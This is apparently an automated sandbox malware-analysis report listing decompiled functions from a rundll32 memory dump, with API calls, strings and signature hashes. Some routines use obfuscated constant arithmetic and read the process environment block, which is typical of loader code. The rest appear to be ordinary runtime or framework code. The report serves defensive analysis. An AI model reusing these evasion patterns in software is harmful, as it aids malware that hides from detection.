                                                                                                                                  0x002d9117
                                                                                                                                  0x002d912b

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bbcffae19a17f58652988d99330dd2db6a2339275f6f1778c9c0d6c506e1f797
                                                                                                                                  • Instruction ID: 97529e913b846f3c1a2590248b3a0205e9b0faea1cf122aa9a6833c0b53135bf
                                                                                                                                  • Opcode Fuzzy Hash: bbcffae19a17f58652988d99330dd2db6a2339275f6f1778c9c0d6c506e1f797
                                                                                                                                  • Instruction Fuzzy Hash: F231F071D0121EEBCF48EFA6D94A4EEBBB1FF44318F208199D421B6250D7B90A59DF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D7FF2 Relevance: .1, Instructions: 54COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002D7FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E002D1E22(_v28, _v24, _t73, E002D1DB9(_t67), _v20, _v16);
			}














                                                                                                                                  0x002d7ff8
                                                                                                                                  0x002d7ffc
                                                                                                                                  0x002d8003
                                                                                                                                  0x002d800a
                                                                                                                                  0x002d8011
                                                                                                                                  0x002d8018
                                                                                                                                  0x002d801c
                                                                                                                                  0x002d8023
                                                                                                                                  0x002d802a
                                                                                                                                  0x002d8031
                                                                                                                                  0x002d8038
                                                                                                                                  0x002d803c
                                                                                                                                  0x002d8043
                                                                                                                                  0x002d804a
                                                                                                                                  0x002d8055
                                                                                                                                  0x002d805b
                                                                                                                                  0x002d805e
                                                                                                                                  0x002d8061
                                                                                                                                  0x002d8065
                                                                                                                                  0x002d806c
                                                                                                                                  0x002d8073
                                                                                                                                  0x002d807a
                                                                                                                                  0x002d8081
                                                                                                                                  0x002d8088
                                                                                                                                  0x002d808f
                                                                                                                                  0x002d8096
                                                                                                                                  0x002d809d
                                                                                                                                  0x002d80a4
                                                                                                                                  0x002d80ab
                                                                                                                                  0x002d80af
                                                                                                                                  0x002d80b6
                                                                                                                                  0x002d80e2

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                  • Instruction ID: e53b513562d97e084033314999e811c2237173b379ba21f077688dac69ec0389
                                                                                                                                  • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                  • Instruction Fuzzy Hash: A521EFB2C0131EEBCB48DFE5D94A4EEFBB0BB10314F208189D511B2264C3B40B598F91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E4087 Relevance: .0, Instructions: 2COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002E4087() {

				return  *[fs:0x30];
			}



                                                                                                                                  0x002e408d

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                  			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100545cc; // 0x4cc2cb6b
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10030D27(E10043F3E, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10030030(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E10014538(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1001461E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10014C3E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                                                  0x10014da8
                                                                                                                                  0x10014da9
                                                                                                                                  0x10014daf
                                                                                                                                  0x10014db3
                                                                                                                                  0x10014dba
                                                                                                                                  0x10014dc0
                                                                                                                                  0x10014dc7
                                                                                                                                  0x10014dd8
                                                                                                                                  0x10014ddf
                                                                                                                                  0x10014de2
                                                                                                                                  0x10014de5
                                                                                                                                  0x10014de8
                                                                                                                                  0x10014df6
                                                                                                                                  0x10014df9
                                                                                                                                  0x10014dfd
                                                                                                                                  0x10014ecb
                                                                                                                                  0x10014f87
                                                                                                                                  0x10014f8b
                                                                                                                                  0x10014f9f
                                                                                                                                  0x10014fa2
                                                                                                                                  0x10014fac
                                                                                                                                  0x10014fb2
                                                                                                                                  0x10014fca
                                                                                                                                  0x10014fd6
                                                                                                                                  0x10014fdb
                                                                                                                                  0x10014fde
                                                                                                                                  0x10014fde
                                                                                                                                  0x10014fac
                                                                                                                                  0x10014ed1
                                                                                                                                  0x10014ee5
                                                                                                                                  0x10014ef0
                                                                                                                                  0x10014f06
                                                                                                                                  0x10014f15
                                                                                                                                  0x10014f2d
                                                                                                                                  0x10014f32
                                                                                                                                  0x10014f38
                                                                                                                                  0x10014f44
                                                                                                                                  0x10014f47
                                                                                                                                  0x10014f59
                                                                                                                                  0x10014f65
                                                                                                                                  0x10014f6a
                                                                                                                                  0x10014f6d
                                                                                                                                  0x10014f6d
                                                                                                                                  0x10014f38
                                                                                                                                  0x10014f77
                                                                                                                                  0x10014f77
                                                                                                                                  0x10014ef0
                                                                                                                                  0x10014e03
                                                                                                                                  0x10014e0b
                                                                                                                                  0x10014e0e
                                                                                                                                  0x10014e11
                                                                                                                                  0x10014e23
                                                                                                                                  0x10014e2c
                                                                                                                                  0x10014e34
                                                                                                                                  0x10014e41
                                                                                                                                  0x10014e44
                                                                                                                                  0x10014e4b
                                                                                                                                  0x10014e4f
                                                                                                                                  0x10014e53
                                                                                                                                  0x10014e56
                                                                                                                                  0x10014e59
                                                                                                                                  0x10014e66
                                                                                                                                  0x10014e72
                                                                                                                                  0x10014e77
                                                                                                                                  0x10014e7a
                                                                                                                                  0x10014e7a
                                                                                                                                  0x10014e81
                                                                                                                                  0x10014e81
                                                                                                                                  0x10014e86
                                                                                                                                  0x10014e89
                                                                                                                                  0x10014ea0
                                                                                                                                  0x10014ea7
                                                                                                                                  0x10014eb6
                                                                                                                                  0x10014fec
                                                                                                                                  0x10014ff3
                                                                                                                                  0x10015003
                                                                                                                                  0x10015006
                                                                                                                                  0x10015009
                                                                                                                                  0x10015010
                                                                                                                                  0x10015013
                                                                                                                                  0x1001501a
                                                                                                                                  0x10015026
                                                                                                                                  0x10015030
                                                                                                                                  0x10015035
                                                                                                                                  0x10015035
                                                                                                                                  0x1001503a
                                                                                                                                  0x1001503f
                                                                                                                                  0x1001505c
                                                                                                                                  0x1001505c
                                                                                                                                  0x10015063
                                                                                                                                  0x10015068
                                                                                                                                  0x00000000
                                                                                                                                  0x10015041
                                                                                                                                  0x10015041
                                                                                                                                  0x10015048
                                                                                                                                  0x10015050
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x10015052
                                                                                                                                  0x10015056
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x10015058
                                                                                                                                  0x1001505a
                                                                                                                                  0x00000000
                                                                                                                                  0x1001505a
                                                                                                                                  0x10014ebc
                                                                                                                                  0x10014ebc
                                                                                                                                  0x1001506a
                                                                                                                                  0x1001506d
                                                                                                                                  0x10015075
                                                                                                                                  0x10015076
                                                                                                                                  0x10015077
                                                                                                                                  0x1001508c
                                                                                                                                  0x1001508c

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                  • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                  • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                                  • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                                  • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                                  • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                                  • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                                  • _memset.LIBCMT ref: 10014FF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                  • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                  • API String ID: 434808117-483790700
                                                                                                                                  • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                  • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                                  • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                  • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E1002E129(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                                  0x1002e136
                                                                                                                                  0x1002e13f
                                                                                                                                  0x1002e148
                                                                                                                                  0x1002e152
                                                                                                                                  0x1002e15c
                                                                                                                                  0x1002e166
                                                                                                                                  0x1002e170
                                                                                                                                  0x1002e17a
                                                                                                                                  0x1002e184
                                                                                                                                  0x1002e18e
                                                                                                                                  0x1002e198
                                                                                                                                  0x1002e1a2
                                                                                                                                  0x1002e1a7
                                                                                                                                  0x1002e1ae

                                                                                                                                  APIs
                                                                                                                                  • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                                  • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                                  • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                                  • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                                  • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                                  • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                                  • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                                  • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                                  • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                                  • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                                  • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                                  • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClipboardFormatRegister
                                                                                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                  • API String ID: 1228543026-2889995556
                                                                                                                                  • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                  • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                                  • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                  • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E1003548E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x10057934;
					_t41 = TlsSetValue;
					 *0x10057940 = _t7;
					if( *0x10057934 == 0) {
						L6:
						 *0x10057938 = TlsGetValue;
						 *0x10057934 = E10035111;
						 *0x1005793c = _t41;
						 *0x10057940 = TlsFree;
					} else {
						__eflags =  *0x10057938;
						if( *0x10057938 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005793c;
							if( *0x1005793c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x100547c8 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10057938);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100310CD();
							 *0x10057934 = E10035042( *0x10057934);
							 *0x10057938 = E10035042( *0x10057938);
							 *0x1005793c = E10035042( *0x1005793c);
							 *0x10057940 = E10035042( *0x10057940);
							_t18 = E10035923();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10035178(_t37);
								goto L15;
							} else {
								_push(E10035304);
								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100547c4 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E10035840(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x100547c4);
										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E100351B5(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10035178(_t37);
					return 0;
				}
			}

















                                                                                                                                  0x1003548e
                                                                                                                                  0x1003548e
                                                                                                                                  0x1003549a
                                                                                                                                  0x1003549e
                                                                                                                                  0x100354be
                                                                                                                                  0x100354cb
                                                                                                                                  0x100354d8
                                                                                                                                  0x100354dd
                                                                                                                                  0x100354df
                                                                                                                                  0x100354e6
                                                                                                                                  0x100354ec
                                                                                                                                  0x100354f1
                                                                                                                                  0x10035509
                                                                                                                                  0x1003550e
                                                                                                                                  0x10035518
                                                                                                                                  0x10035522
                                                                                                                                  0x10035528
                                                                                                                                  0x100354f3
                                                                                                                                  0x100354f3
                                                                                                                                  0x100354fa
                                                                                                                                  0x00000000
                                                                                                                                  0x100354fc
                                                                                                                                  0x100354fc
                                                                                                                                  0x10035503
                                                                                                                                  0x00000000
                                                                                                                                  0x10035505
                                                                                                                                  0x10035505
                                                                                                                                  0x10035507
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x10035507
                                                                                                                                  0x10035503
                                                                                                                                  0x100354fa
                                                                                                                                  0x1003552d
                                                                                                                                  0x10035533
                                                                                                                                  0x10035536
                                                                                                                                  0x1003553b
                                                                                                                                  0x1003560d
                                                                                                                                  0x1003560d
                                                                                                                                  0x1003560d
                                                                                                                                  0x10035541
                                                                                                                                  0x10035548
                                                                                                                                  0x1003554a
                                                                                                                                  0x1003554c
                                                                                                                                  0x00000000
                                                                                                                                  0x10035552
                                                                                                                                  0x10035552
                                                                                                                                  0x10035568
                                                                                                                                  0x10035578
                                                                                                                                  0x10035588
                                                                                                                                  0x10035595
                                                                                                                                  0x1003559a
                                                                                                                                  0x1003559f
                                                                                                                                  0x100355a1
                                                                                                                                  0x10035608
                                                                                                                                  0x10035608
                                                                                                                                  0x00000000
                                                                                                                                  0x100355a3
                                                                                                                                  0x100355a3
                                                                                                                                  0x100355b4
                                                                                                                                  0x100355b6
